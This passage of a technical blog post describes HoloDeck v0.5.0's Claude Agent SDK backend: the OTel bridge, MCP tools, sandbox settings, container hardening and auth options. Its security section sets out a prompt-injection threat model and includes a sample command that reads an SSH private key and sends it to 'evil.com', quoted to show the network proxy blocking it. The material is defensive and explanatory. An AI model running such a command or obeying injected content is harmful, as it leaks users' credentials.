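env = resolve_env({"DB_HOST": "localhost"}, {"DB_HOST": "db.internal"})
print(substitute("postgres://${DB_HOST}:5432", env))
```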

&lt;h3&gt;
  
  
  OTel Bridge (&lt;code&gt;otel_bridge.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck has a comprehensive &lt;code&gt;ObservabilityConfig&lt;/code&gt; Pydantic model for OpenTelemetry — traces, metrics, logs, the works. But the Claude subprocess runs as a separate process, so you can't pass spans or meters across the process boundary. The bridge translates the config into environment variables that the subprocess reads:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;HoloDeck Config&lt;/th&gt;
&lt;th&gt;Subprocess Env Var&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exporters.otlp.endpoint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_EXPORTER_OTLP_ENDPOINT&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exporters.otlp.protocol&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_EXPORTER_OTLP_PROTOCOL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;traces.capture_content&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;OTEL_LOG_USER_PROMPTS&lt;/code&gt; + &lt;code&gt;OTEL_LOG_TOOL_DETAILS&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;metrics.export_interval_ms&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_METRIC_EXPORT_INTERVAL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;metrics.enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;OTEL_METRICS_EXPORTER&lt;/code&gt; (&lt;code&gt;"otlp"&lt;/code&gt; or &lt;code&gt;"none"&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Privacy is safe by default: content capture is off unless you explicitly enable it, so prompts and tool details stay out of your telemetry backend.&lt;/p&gt;
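&lt;p&gt;As a sketch, the translation amounts to building an env dict from the config. The env var names follow the table above; the flattened config shape and the function itself are illustrative, not the bridge's real signature:&lt;/p&gt;

```python
# Sketch of the OTel bridge's config-to-env translation (table above).
# The flattened cfg keys here are illustrative, not the Pydantic model.
def to_subprocess_env(cfg: dict) -> dict:
    env = {
        "OTEL_EXPORTER_OTLP_ENDPOINT": cfg["otlp_endpoint"],
        "OTEL_EXPORTER_OTLP_PROTOCOL": cfg["otlp_protocol"],
        "OTEL_METRIC_EXPORT_INTERVAL": str(cfg["export_interval_ms"]),
        "OTEL_METRICS_EXPORTER": "otlp" if cfg["metrics_enabled"] else "none",
    }
    if cfg.get("capture_content"):
        # Only set when explicitly enabled: privacy-safe default.
        env["OTEL_LOG_USER_PROMPTS"] = "1"
        env["OTEL_LOG_TOOL_DETAILS"] = "1"
    return env

env = to_subprocess_env({
    "otlp_endpoint": "http://localhost:4317",
    "otlp_protocol": "grpc",
    "export_interval_ms": 60000,
    "metrics_enabled": True,
})
print(env["OTEL_METRICS_EXPORTER"])
```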




&lt;h2&gt;
  
  
  Custom Tools Are Just MCP Servers
&lt;/h2&gt;

&lt;p&gt;This is where the elegance of Claude Agents SDK really shines. When you build &lt;a href="https://platform.claude.com/docs/en/agent-sdk/custom-tools" rel="noopener noreferrer"&gt;custom tools for the SDK&lt;/a&gt;, you're not learning some proprietary plugin API. You're building an MCP server.&lt;/p&gt;

&lt;p&gt;That's it. Your tool is an MCP server. Claude knows how to call MCP servers. The tool gets a name, a JSON schema for its inputs, and a handler function. The SDK packages it as an internal MCP server that the Claude subprocess communicates with via the standard MCP protocol.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from claude_agent_sdk import tool, create_sdk_mcp_server

@tool(name="search_docs", description="Search documentation", schema={...})
async def search_docs(query: str, top_k: int = 5) -&amp;gt; str:
    results = await my_search_engine.search(query, top_k)
    return format_results(results)

server = create_sdk_mcp_server(name="my_tools", tools=[search_docs])

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tools are testable in isolation&lt;/strong&gt; — they're just functions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools are reusable&lt;/strong&gt; — any MCP client can call them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools compose naturally&lt;/strong&gt; — multiple servers, each with their own tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No framework lock-in&lt;/strong&gt; — MCP is an open protocol&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Compare this to Semantic Kernel where you need to create a &lt;code&gt;KernelPlugin&lt;/code&gt;, register it with the kernel, handle the &lt;code&gt;FunctionCallContent&lt;/code&gt; types, and manage the invocation lifecycle yourself. With Claude Agents SDK, you decorate a function and you're done.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Supported Today
&lt;/h2&gt;

&lt;p&gt;As of HoloDeck v0.5.0, here's what works with &lt;code&gt;provider: anthropic&lt;/code&gt;:&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;holodeck test&lt;/code&gt;&lt;/strong&gt; — Run your eval suite against Claude agents. Each test case is a stateless &lt;code&gt;invoke_once()&lt;/code&gt; call with full evaluation metrics (BLEU, ROUGE, G-Eval, RAG faithfulness, etc.)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;holodeck chat&lt;/code&gt;&lt;/strong&gt; — Interactive multi-turn chat with streaming. Token-by-token output with a spinner until the first chunk arrives. Session continuity via &lt;code&gt;session_id&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HoloDeck tools as native Claude SDK tools&lt;/strong&gt; — VectorStoreTool and HierarchicalDocumentTool work seamlessly through the in-process MCP adapter. The agent calls them just like any other tool.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Structured outputs&lt;/strong&gt; — Configure a JSON schema (inline or file path) and the response is validated at startup &lt;em&gt;and&lt;/em&gt; at inference time. Invalid schemas fail fast.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom system prompts&lt;/strong&gt; — Your &lt;code&gt;instructions&lt;/code&gt; (file or inline) become the Claude subprocess's &lt;code&gt;system_prompt&lt;/code&gt;. Full control over agent behavior.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenTelemetry&lt;/strong&gt; — Full observability pipeline. Traces, metrics, and logs forwarded to your OTLP collector through the OTel bridge.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OAuth token auth&lt;/strong&gt; — Use &lt;code&gt;auth_provider: oauth_token&lt;/code&gt; for local development with your Claude Code credentials.&lt;/li&gt;
&lt;/ul&gt;
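&lt;p&gt;The structured-output behavior is easy to picture. Here's a minimal sketch of the fail-fast validation described above: a startup schema check plus an inference-time response check. This is illustrative stdlib code, not HoloDeck's actual validator:&lt;/p&gt;

```python
import json

# Illustrative sketch of fail-fast structured-output validation.
# Not HoloDeck's actual validator; it only shows the two-phase idea.

def validate_schema(schema: dict) -> None:
    """Startup check: reject obviously malformed schemas before any inference."""
    if schema.get("type") != "object":
        raise ValueError("root schema must have type 'object'")
    for field in schema.get("required", []):
        if field not in schema.get("properties", {}):
            raise ValueError(f"required field {field!r} has no property definition")

def validate_response(schema: dict, raw: str) -> dict:
    """Inference-time check: the model's JSON must satisfy the schema."""
    data = json.loads(raw)
    for field in schema.get("required", []):
        if field not in data:
            raise ValueError(f"response missing required field {field!r}")
    return data

schema = {
    "type": "object",
    "properties": {"answer": {"type": "string"}},
    "required": ["answer"],
}
validate_schema(schema)                                  # fails fast at startup
result = validate_response(schema, '{"answer": "42"}')   # validated per response
```

&lt;p&gt;In HoloDeck the schema itself comes from the agent YAML, inline or as a file path; the same two checks run at startup and at inference time.&lt;/p&gt;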

&lt;h3&gt;
  
  
  Claude-Specific Capabilities
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Extended thinking with configurable token budgets (1,000-100,000 tokens)&lt;/li&gt;
&lt;li&gt;Built-in web search&lt;/li&gt;
&lt;li&gt;Bash execution with excluded command lists&lt;/li&gt;
&lt;li&gt;File system access (read/write/edit individually toggleable)&lt;/li&gt;
&lt;li&gt;Subagent execution (1-16 parallel)&lt;/li&gt;
&lt;li&gt;Permission modes (&lt;code&gt;manual&lt;/code&gt;, &lt;code&gt;acceptEdits&lt;/code&gt;, &lt;code&gt;acceptAll&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Max turns limit with automatic detection&lt;/li&gt;
&lt;li&gt;5 auth providers: &lt;code&gt;api_key&lt;/code&gt;, &lt;code&gt;oauth_token&lt;/code&gt;, &lt;code&gt;bedrock&lt;/code&gt;, &lt;code&gt;vertex&lt;/code&gt;, &lt;code&gt;foundry&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Security: Sandboxing and Secure Deployment
&lt;/h2&gt;

&lt;p&gt;Here's the part where most "just use the API" agent frameworks hand-wave. The Claude Agent SDK actually ships with serious, layered security — and if you're running agents that can execute bash commands and write files, you &lt;em&gt;need&lt;/em&gt; this.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Threat Model
&lt;/h3&gt;

&lt;p&gt;Agents aren't traditional software that follows predetermined code paths. They generate actions dynamically based on context. That means they can be influenced by the content they process — files, web pages, user input. This is prompt injection, and it's a real risk when your agent has bash and file access.&lt;/p&gt;

&lt;p&gt;The good news: Claude's latest models are &lt;a href="https://assets.anthropic.com/m/64823ba7485345a7/Claude-Opus-4-5-System-Card.pdf" rel="noopener noreferrer"&gt;among the most robust frontier models&lt;/a&gt; against prompt injection. But defense in depth is still good practice.&lt;/p&gt;

&lt;h3&gt;
  
  
  Built-in Sandboxing
&lt;/h3&gt;

&lt;p&gt;The Claude Agent SDK includes a &lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;sandboxed bash tool&lt;/a&gt; that enforces OS-level isolation — not just "we check the command string," but actual kernel-level enforcement:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;macOS&lt;/strong&gt;: Uses Apple's Seatbelt framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux&lt;/strong&gt;: Uses &lt;a href="https://github.com/containers/bubblewrap" rel="noopener noreferrer"&gt;bubblewrap&lt;/a&gt; for namespace-based isolation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Windows (WSL2)&lt;/strong&gt;: Uses bubblewrap, same as Linux. WSL1 is &lt;em&gt;not&lt;/em&gt; supported (requires kernel features only available in WSL2). Native Windows sandboxing is planned but not yet available.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network isolation&lt;/strong&gt;: All network access goes through a proxy — domain allowlists, not blocklists
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────┐
│               Agent Sandbox                     │
│                                                 │
│ ┌─────────────────┐  ┌────────────────────────┐ │
│ │ Filesystem      │  │ Network (proxy-gated)  │ │
│ │ • CWD: r/w      │  │ • Only allowed domains │ │
│ │ • Rest: r/o     │  │ • All traffic proxied  │ │
│ │ • Denied dirs   │  │ • No direct egress     │ │
│ └─────────────────┘  └────────────────────────┘ │
│                                                 │
│ OS-level enforcement (Seatbelt / bubblewrap)    │
│ All child processes inherit restrictions        │
└─────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means even if an attacker successfully injects a prompt that tricks the agent into running &lt;code&gt;curl evil.com/exfil?data=$(cat ~/.ssh/id_rsa)&lt;/code&gt;, the network proxy blocks it. The agent literally cannot reach domains that aren't on the allowlist.&lt;/p&gt;
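&lt;p&gt;The allowlist logic at the heart of that proxy is simple to sketch. This is not the SDK's implementation, just the core idea: egress is permitted only for exact or subdomain matches against a configured set:&lt;/p&gt;

```python
from urllib.parse import urlparse

# Core idea behind the sandbox's egress proxy (illustrative, not the
# SDK's actual code): only allowlisted domains are reachable.
ALLOWED_DOMAINS = {"api.anthropic.com", "pypi.org"}

def is_egress_allowed(url: str) -> bool:
    host = urlparse(url).hostname or ""
    # Permit exact matches and subdomains of allowlisted domains.
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)

assert is_egress_allowed("https://api.anthropic.com/v1/messages")
assert not is_egress_allowed("https://evil.com/exfil")
```

&lt;p&gt;The real proxy enforces this at the network layer, so even child processes the agent spawns inherit the restriction.&lt;/p&gt;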

&lt;h3&gt;
  
  
  Configuring the Sandbox Programmatically
&lt;/h3&gt;

&lt;p&gt;The SDK exposes all of this as a &lt;code&gt;SandboxSettings&lt;/code&gt; TypedDict you can pass directly in your agent options:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from claude_code_sdk import SandboxSettings

sandbox_settings: SandboxSettings = {
    "enabled": True,
    # Auto-approve bash commands when sandboxed — no more approval fatigue
    "autoAllowBashIfSandboxed": True,
    # Commands that must run outside the sandbox (they use the normal permission flow)
    "excludedCommands": ["docker", "git push"],
    # Block the escape hatch — all commands MUST run sandboxed
    "allowUnsandboxedCommands": False,
    "network": {
        # Only these Unix sockets are accessible
        "allowUnixSockets": ["/var/run/docker.sock"],
        # Allow binding to localhost ports (for dev servers, etc.)
        "allowLocalBinding": True
    },
    # For running inside unprivileged Docker (weaker security, use with caution)
    "enableWeakerNestedSandbox": False,
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key fields:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Turn on OS-level bash sandboxing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;autoAllowBashIfSandboxed&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Skip permission prompts for sandboxed commands&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;excludedCommands&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;[]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Commands that run outside the sandbox (e.g., &lt;code&gt;docker&lt;/code&gt;, &lt;code&gt;git&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;allowUnsandboxedCommands&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;True&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allow &lt;code&gt;dangerouslyDisableSandbox&lt;/code&gt; escape hatch. Set to &lt;code&gt;False&lt;/code&gt; for strict mode.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;network.allowUnixSockets&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;[]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Unix sockets accessible from within the sandbox&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;network.allowLocalBinding&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allow processes to bind to localhost ports&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;enableWeakerNestedSandbox&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;False&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Linux-only: weaker sandbox for unprivileged Docker. Reduces security significantly.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;autoAllowBashIfSandboxed&lt;/code&gt; flag is particularly nice for CI/CD and automated testing. Instead of the agent asking for permission on every &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;grep&lt;/code&gt;, and &lt;code&gt;cat&lt;/code&gt;, sandboxed commands just run. But if the command tries to reach a blocked domain or write outside the sandbox, it fails at the OS level — no prompt needed, just a hard block.&lt;/p&gt;

&lt;p&gt;Setting &lt;code&gt;allowUnsandboxedCommands: False&lt;/code&gt; is the strict mode. It completely disables the &lt;code&gt;dangerouslyDisableSandbox&lt;/code&gt; escape hatch, forcing every bash command to run inside the sandbox. Combined with &lt;code&gt;excludedCommands&lt;/code&gt; for the handful of tools that genuinely can't be sandboxed (like Docker), this gives you a tight security posture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Production Hardening
&lt;/h3&gt;

&lt;p&gt;For production deployments, Anthropic's &lt;a href="https://platform.claude.com/docs/en/agent-sdk/secure-deployment" rel="noopener noreferrer"&gt;secure deployment guide&lt;/a&gt; lays out a serious defense-in-depth strategy:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container isolation with zero network:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker run \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --read-only \
  --network none \
  --memory 2g \
  --pids-limit 100 \
  --user 1000:1000 \
  -v /path/to/code:/workspace:ro \
  -v /var/run/proxy.sock:/var/run/proxy.sock:ro \
  agent-image

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;--network none&lt;/code&gt; flag removes &lt;em&gt;all&lt;/em&gt; network interfaces. The only way out is through a Unix socket connected to a proxy running on the host. That proxy enforces domain allowlists, injects credentials, and logs everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The proxy pattern for credentials&lt;/strong&gt; is particularly elegant. Instead of giving the agent an API key, you run a proxy outside the agent's security boundary that injects credentials into outgoing requests. The agent makes requests without credentials → the proxy adds them → forwards to the destination. The agent never sees the actual secrets.&lt;/p&gt;
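&lt;p&gt;A sketch of that injection step, to make the pattern concrete. The header and env var names are illustrative assumptions; the point is that secrets live only on the proxy's side of the boundary:&lt;/p&gt;

```python
import os

# Sketch of the credential-injection pattern. The proxy runs OUTSIDE the
# agent's security boundary; the agent's request carries no secrets.
# Header and env var names here are illustrative assumptions.

def inject_credentials(headers: dict, host: str) -> dict:
    outbound = dict(headers)  # copy the agent-supplied headers
    if host == "api.anthropic.com":
        outbound["x-api-key"] = os.environ.get("ANTHROPIC_API_KEY", "")
    return outbound

agent_request = {"accept": "application/json"}  # what the agent sends
proxied = inject_credentials(agent_request, "api.anthropic.com")
```

&lt;p&gt;Even a fully compromised agent can only make requests; it has nothing worth exfiltrating, because the secret never enters its environment.&lt;/p&gt;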

&lt;p&gt;&lt;strong&gt;Isolation technology options:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Isolation Strength&lt;/th&gt;
&lt;th&gt;Overhead&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sandbox runtime&lt;/td&gt;
&lt;td&gt;Good&lt;/td&gt;
&lt;td&gt;Very low&lt;/td&gt;
&lt;td&gt;Local dev, CI/CD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker + &lt;code&gt;--network none&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Setup dependent&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Standard deployment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gVisor (&lt;code&gt;runsc&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Excellent&lt;/td&gt;
&lt;td&gt;Medium-High&lt;/td&gt;
&lt;td&gt;Multi-tenant, untrusted content&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firecracker VMs&lt;/td&gt;
&lt;td&gt;Excellent&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Maximum isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What HoloDeck Does Today
&lt;/h3&gt;

&lt;p&gt;HoloDeck's &lt;code&gt;ClaudeBackend&lt;/code&gt; already implements several security practices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pre-flight validators&lt;/strong&gt; catch misconfigurations before the subprocess starts (missing Node.js, invalid credentials, embedding provider mismatches, working directory collisions with existing &lt;code&gt;CLAUDE.md&lt;/code&gt; files)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential injection&lt;/strong&gt; via subprocess env vars — auth tokens are scoped to the subprocess, not global&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Permission mode mapping&lt;/strong&gt; — &lt;code&gt;acceptEdits&lt;/code&gt; and &lt;code&gt;acceptAll&lt;/code&gt; are escalated to &lt;code&gt;bypassPermissions&lt;/code&gt; only in &lt;code&gt;test&lt;/code&gt; mode (non-interactive automation). In &lt;code&gt;chat&lt;/code&gt; mode, the configured permission level is respected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool allowlists&lt;/strong&gt; via &lt;code&gt;claude.allowed_tools&lt;/code&gt; — explicitly restrict which MCP tools the agent can invoke&lt;/li&gt;
&lt;/ul&gt;
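&lt;p&gt;Put together, those practices are a few lines of agent YAML. Here's a locked-down sketch using only fields mentioned in this post; the exact nesting of &lt;code&gt;permission_mode&lt;/code&gt; and the tool name are assumptions, so check the HoloDeck docs before copying:&lt;/p&gt;

```yaml
name: locked-down-agent
model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: api_key
instructions:
  inline: "You are a careful assistant."
claude:
  permission_mode: manual   # sensitive actions require explicit approval
  allowed_tools:            # explicit tool allowlist (name is illustrative)
    - vector_store_search
  bash:
    enabled: false          # no shell for this agent
  file_system:
    read: true
    write: false
  max_turns: 5
```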

&lt;p&gt;The sandboxing and proxy patterns from the SDK docs will naturally compose with HoloDeck's deployment pipeline (&lt;code&gt;holodeck deploy&lt;/code&gt;) once we add Claude backend support to &lt;code&gt;holodeck serve&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Using the Claude Agent SDK Without an Anthropic API Key
&lt;/h2&gt;

&lt;p&gt;Here's something most people don't realize: the Claude Agent SDK doesn't &lt;em&gt;have&lt;/em&gt; to talk to Anthropic's servers. It speaks the Anthropic API protocol, and any endpoint that implements that protocol works. Ollama does exactly this — it exposes an &lt;strong&gt;Anthropic-compatible&lt;/strong&gt; endpoint that the SDK can talk to natively.&lt;/p&gt;

&lt;p&gt;As documented in the &lt;a href="https://docs.ollama.com/integrations/claude-code" rel="noopener noreferrer"&gt;Ollama integration guide&lt;/a&gt;, you can point the SDK at a local Ollama instance by setting &lt;code&gt;ANTHROPIC_BASE_URL&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export ANTHROPIC_BASE_URL=http://localhost:11434

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To be clear: the SDK does &lt;strong&gt;not&lt;/strong&gt; support OpenAI-compatible endpoints. It speaks the Anthropic Messages API. Ollama works because Ollama implemented the Anthropic API format on their side. Any provider that does the same (or any proxy that translates to it) will work too.&lt;/p&gt;
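&lt;p&gt;Concretely, "speaks the Anthropic Messages API" means requests shaped like the following. This sketch only builds the request without sending it; any server that accepts this shape at &lt;code&gt;POST /v1/messages&lt;/code&gt; can sit behind &lt;code&gt;ANTHROPIC_BASE_URL&lt;/code&gt;:&lt;/p&gt;

```python
import json
import os

# Build (but don't send) an Anthropic Messages API request. Any endpoint
# implementing this shape (Anthropic's API or a local Ollama) works.
base_url = os.environ.get("ANTHROPIC_BASE_URL", "https://api.anthropic.com")

payload = {
    "model": "claude-sonnet-4-20250514",
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello"}],
}
request = {
    "method": "POST",
    "url": f"{base_url}/v1/messages",
    "headers": {
        "content-type": "application/json",
        "anthropic-version": "2023-06-01",  # required API version header
    },
    "body": json.dumps(payload),
}
```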

&lt;p&gt;This means you can experiment with the Claude Agent SDK's tooling, MCP integration, and agent patterns using local models — completely free, completely offline. The SDK's tool-calling loop, structured output, and session management all work the same way regardless of what's behind the endpoint.&lt;/p&gt;

&lt;p&gt;Obviously you won't get Claude-level reasoning from a local 7B model, but for testing tool integration, MCP server development, and agent workflow design, it's perfectly usable.&lt;/p&gt;




&lt;h2&gt;
  
  
  Auth: Local Experimentation vs Production
&lt;/h2&gt;

&lt;p&gt;One of the friction points with agent SDKs is authentication. The Claude Agent SDK makes this surprisingly painless for local development.&lt;/p&gt;

&lt;p&gt;As &lt;a href="https://x.com/trq212/status/2024212378402095389?s=20" rel="noopener noreferrer"&gt;Thariq pointed out on X&lt;/a&gt;, using your &lt;code&gt;CLAUDE_CODE_OAUTH_TOKEN&lt;/code&gt; for local experimentation is actually allowed. This means if you have Claude Code installed and authenticated, you can build and test custom agents without setting up a separate API key.&lt;/p&gt;

&lt;p&gt;In HoloDeck, this is a simple YAML toggle:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token # Uses CLAUDE_CODE_OAUTH_TOKEN

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;However&lt;/strong&gt; — and this is important — &lt;strong&gt;when you ship these agents to production, you must use an Anthropic API key.&lt;/strong&gt; The OAuth token is tied to your personal Claude Code session. It's not meant for server-side deployment.&lt;/p&gt;

&lt;p&gt;For production:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: api_key # Uses ANTHROPIC_API_KEY

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or if you're running through a cloud provider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: bedrock # or vertex, foundry

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;HoloDeck's validators check for the right credentials at startup and inject them into the subprocess environment, so you get a clear error if something's misconfigured rather than a cryptic 401 at inference time.&lt;/p&gt;
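&lt;p&gt;The validator idea is simple enough to sketch. This is not HoloDeck's actual code, just the fail-fast shape: map each &lt;code&gt;auth_provider&lt;/code&gt; to the env var it needs and refuse to start without it:&lt;/p&gt;

```python
import os

# Sketch of a pre-flight credential check (not HoloDeck's actual code):
# fail at startup with a clear message instead of a cryptic 401 later.
REQUIRED_ENV = {
    "api_key": "ANTHROPIC_API_KEY",
    "oauth_token": "CLAUDE_CODE_OAUTH_TOKEN",
}

def preflight_check(auth_provider: str) -> str:
    """Return the env var backing this provider, or raise with a clear error."""
    var = REQUIRED_ENV.get(auth_provider)
    if var is None:
        raise ValueError(f"unknown auth_provider: {auth_provider!r}")
    if not os.environ.get(var):
        raise RuntimeError(f"auth_provider {auth_provider!r} needs {var} to be set")
    return var
```

&lt;p&gt;The real validators also check things like Node.js availability and working-directory collisions, but the principle is the same: surface misconfiguration before the subprocess ever starts.&lt;/p&gt;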




&lt;h2&gt;
  
  
  What's Coming Next
&lt;/h2&gt;

&lt;p&gt;HoloDeck v0.5.0 is the foundation. Here's what we're building on top of it:&lt;/p&gt;

&lt;h3&gt;
  
  
  Hooks
&lt;/h3&gt;

&lt;p&gt;The Claude Agent SDK supports &lt;a href="https://docs.anthropic.com/en/docs/agents-and-tools/claude-code/hooks" rel="noopener noreferrer"&gt;hooks&lt;/a&gt; — shell commands that execute in response to agent events (tool calls, message sends, etc.). We'll expose these as YAML config so you can add pre/post processing, logging, or validation to any agent action without writing code.&lt;/p&gt;
